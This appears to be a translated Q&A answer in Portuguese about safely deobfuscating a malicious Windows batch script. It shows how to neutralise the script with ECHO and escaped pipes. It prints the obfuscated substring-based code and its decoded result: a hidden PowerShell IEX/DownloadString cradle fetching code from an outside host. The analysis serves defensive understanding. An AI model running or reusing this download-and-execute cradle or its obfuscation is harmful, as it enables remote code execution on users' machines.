Para desorientar o código (desde que possivelmente incompleto e um pouco confuso), você pode ajustá-lo antes de executar para que exiba apenas as operações perigosas em vez de executá-las
- usando
ECHO
command e / ou -
escapando todos redirecionamentos (alguns
cmd
caracteres venenosos)
, conforme mostrado no seguinte comentário trecho de código:
@echo off
ECHO cd %SystemRoot%\System32
:: ↑↑ there is nothing to do in the "%SystemRoot%\System32" folder
set uQmFERgK=GFYpgWoTABQSI5bRJVKaHwNjcO1tPlf8k4zMv3dsUeXqEZxDCi62L09u7nrmyh
set JD=W^i^n
set beoxNuYr=^d^o^w
set fSUXCI=^sPo
set XFY=^we^r
set NKHoDvv=She
set DdAvVw=^l^l\
set BnCCBy=v^1^.
set xuuyxYlz=^0^\p^o
set zEonzEj=^w^e
set nqfsDHhb=r^sh
set tsaNePh=el^l
set qIrKO=^.e^x
set qlLkftpA=^e -^n
set pZckbH=op^
set MrCpkeh=-w
set kGm=^i^n ^1^ -
ECHO set date=%uQmFERgK:~49,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (^"%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~42,1% (%uQmFERgK:~22,1%%uQmFERgK:~44,1%%uQmFERgK:~5,1%-%uQmFERgK:~25,1%%uQmFERgK:~9,1%%uQmFERgK:~16,1%%uQmFERgK:~41,1%%uQmFERgK:~24,1%%uQmFERgK:~7,1% %uQmFERgK:~22,1%%uQmFERgK:~41,1%%uQmFERgK:~27,1%.%uQmFERgK:~21,1%%uQmFERgK:~41,1%%uQmFERgK:~9,1%%uQmFERgK:~48,1%%uQmFERgK:~52,1%%uQmFERgK:~12,1%%uQmFERgK:~44,1%%uQmFERgK:~57,1%%uQmFERgK:~27,1%).%uQmFERgK:~38,1%%uQmFERgK:~25,1%%uQmFERgK:~21,1%%uQmFERgK:~22,1%%uQmFERgK:~52,1%%uQmFERgK:~6,1%%uQmFERgK:~8,1%%uQmFERgK:~38,1%%uQmFERgK:~11,1%%uQmFERgK:~7,1%%uQmFERgK:~15,1%%uQmFERgK:~49,1%%uQmFERgK:~57,1%%uQmFERgK:~4,1%('%uQmFERgK:~61,1%%uQmFERgK:~27,1%%uQmFERgK:~27,1%%uQmFERgK:~3,1%%uQmFERgK:~39,1%://%uQmFERgK:~38,1%%uQmFERgK:~29,1%%uQmFERgK:~59,1%.%uQmFERgK:~3,1%%uQmFERgK:~19,1%%uQmFERgK:~57,1%%uQmFERgK:~57,1%%uQmFERgK:~6,1%%uQmFERgK:~38,1%.%uQmFERgK:~24,1%%uQmFERgK:~6,1%%uQmFERgK:~59,1%/?%uQmFERgK:~38,1%%uQmFERgK:~5,1%%uQmFERgK:~9,1%%uQmFERgK:~32,1%%uQmFERgK:~55,1%%uQmFERgK:~4,1%%uQmFERgK:~25,1%%uQmFERgK:~8,1%%uQmFERgK:~2,1%%uQmFERgK:~50,1%%uQmFERgK:~35,1%%uQmFERgK:~52,1%/%uQmFERgK:~16,1%%uQmFERgK:~27,1%%uQmFERgK:~9,1%%uQmFERgK:~41,1%%uQmFERgK:~31,1%%uQmFERgK:~3,1%%uQmFERgK:~18,1%%uQmFERgK:~7,1%%uQmFERgK:~35,1%%uQmFERgK:~48,1%%uQmFERgK:~11,1%%uQmFERgK:~4,1%%uQmFERgK:~3,1%%uQmFERgK:~15,1%%uQmFERgK:~41,1%%uQmFERgK:~17,1%%uQmFERgK:~42,1%%uQmFERgK:~61,1%%uQmFERgK:~45,1%+%uQmFERgK:~43,1%%uQmFERgK:~48,1%%uQmFERgK:~23,1%%uQmFERgK:~2,1%%uQmFERgK:~42,1%%uQmFERgK:~21,1%%uQmFERgK:~61,1%%uQmFERgK:~41,1%%uQmFERgK:~20,1%%uQmFERgK:~30,1%%uQmFERgK:~39,1%%uQmFERgK:~48,1%%uQmFERgK:~12,1%%uQmFERgK:~52,1%%uQmFERgK:~42,1%%uQmFERgK:~19,1%%uQmFERgK:~37,1%%uQmFERgK:~1,1%%uQmFERgK:~23,1%%uQmFERgK:~37,1%%uQmFERgK:~21,1%%uQmFERgK:~6,1%%uQmFERgK:~57,1%%uQmFERgK:~38,1%%uQmFERgK:~23,1%%uQmFERgK:~31,1%%uQmFERgK:~60,1%%uQmFERgK:~15,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~39,1%%uQmFERgK:~25,1%%uQmFERgK:~11,1%%uQmFERgK:~25,1%%uQmFERgK:~43,1%%uQmFERgK:~23,1%%uQmFERgK:~58,1%%uQmFERgK:~23,1%%uQmFERgK:~14,1%%uQmFERgK:~25,1%%uQmFERgK:~5,1%%uQmFERgK:~55,1%%uQmFERgK:~58,1%%uQmFERgK:~52,1%%uQmFERgK:~22,1%%uQmFERgK:~7,1%%uQmFERgK:~36,1%%uQmFERgK:~12,1%G%uQmFERgK:~8,1%%uQmFERgK:~19,1%%uQmFERgK:~8,1%%uQmFERgK:~6,1%%uQmFERgK:~17,1%%uQmFERgK:~21,1%%uQmFERgK:~37,1%%uQmFERgK:~32,1%%uQmFERgK:~47,1%%uQmFERgK:~31,1%%uQmFERgK:~51,1%/%uQmFERgK:~5,1%%uQmFERgK:~58,1%%uQmFERgK:~12,1%%uQmFERgK:~28,1%%uQmFERgK:~8,1%%uQmFERgK:~14,1%%uQmFERgK:~37,1%%uQmFERgK:~17,1%%uQmFERgK:~35,1%%uQmFERgK:~26,1%%uQmFERgK:~8,1%%uQmFERgK:~24,1%%uQmFERgK:~30,1%%uQmFERgK:~3,1%%uQmFERgK:~23,1%%uQmFERgK:~29,1%%uQmFERgK:~21,1%%uQmFERgK:~3,1%')^");
:: ↑↑↑ ↑↑↑↑ volatile environment variable "date" contains current system date
ECHO echo %%date%% ^| %JD%%beoxNuYr%%fSUXCI%%XFY%%NKHoDvv%%DdAvVw%%BnCCBy%%xuuyxYlz%%zEonzEj%%nqfsDHhb%%tsaNePh%%qIrKO%%qlLkftpA%%pZckbH%%MrCpkeh%%kGm%
:: ↑↑ escape the pipe operator
Código do resultado:
cd C:\WINDOWS\System32
set date=iEX ("IEX (NEW-OBJecT Net.weBCLIEnt).dOwNLoAdSTRing('https://dlm.pannod.com/?dWBkugOAY6ML/JtBe8pKTMCSgpReVXhZ+qCjYXwheHfsCILXa3Fj3wondj8yROSsOSOqjrjbOWurLNTvIGAaAoVw3kD82/WrIPAb3VM1Acfpjlwp')");
echo %date% | WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
mostra que é uma tentativa de
-
faça o download de alguns códigos em
https://dlm.pannod.com/
e -
execute esse código no Windows Powershell usando o
Invoke-Expression
cmdlet (consulte oIEX
alias):
Outros recursos (leitura obrigatória, incompleta):
- (referência de comando) Um índice A-Z da linha de comando do Windows CMD
- (particularidades adicionais) Sintaxe da linha de comando do shell do Windows CMD
- (
%uQmFERgK:~49,1%
etc.) Extrair parte de uma variável (substring) - Editar / substituir variável